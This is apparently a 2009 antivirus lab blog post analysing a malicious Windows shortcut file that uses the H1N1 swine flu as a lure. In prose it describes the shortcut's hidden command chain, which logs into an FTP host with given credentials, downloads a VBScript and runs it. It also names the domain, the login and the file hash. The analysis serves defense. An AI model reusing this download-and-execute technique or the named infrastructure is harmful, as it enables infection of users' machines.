<<<
NEWS FROM THE LAB - Monday, July 27, 2009
>>>
 

 
H1N1 Shortcut Malware Posted by Mikko @ 11:35 GMT

We ran into another new piece of malware using the "H1N1" swine flu as a lure.

This one is a shortcut file. And it's not a Windows EXE executable that has been renamed to .LNK, it is an actual link file.

Here's what the file looks like (md5: d17e956522f83995654666c0f2343797).

H1N1

Looking at the file from command prompt, it looks like a harmless shortcut, 1987 bytes in size.

H1N1

But when you view the contents, you see something suspicious:

H1N1

Let's have a look at the properties of the shortcut:

H1N1

It's linking to %ComSpec%? Doesn't sound too good. Let's copy and paste where this shortcut is linking to:

H1N1

That doesn't make much sense.

Let's try break that into smaller pieces to see what it's doing:

LNK shortcut malware code

As an end result, clicking on this shortcut will cause your machine to do the following things:

  •  Connect to an ftp site called www.g03z.com
  •  Log in with username aa33 and password bb33
  •  Download a script called p.vbs
  •  Run the script

So who owns g03z.com? Well, it's Mr. Zzzzggg:

H1N1

The domain is still up, but the file p.vbs is currently missing from the server, so right now nothing happens.

We detect and block this malicious shortcut.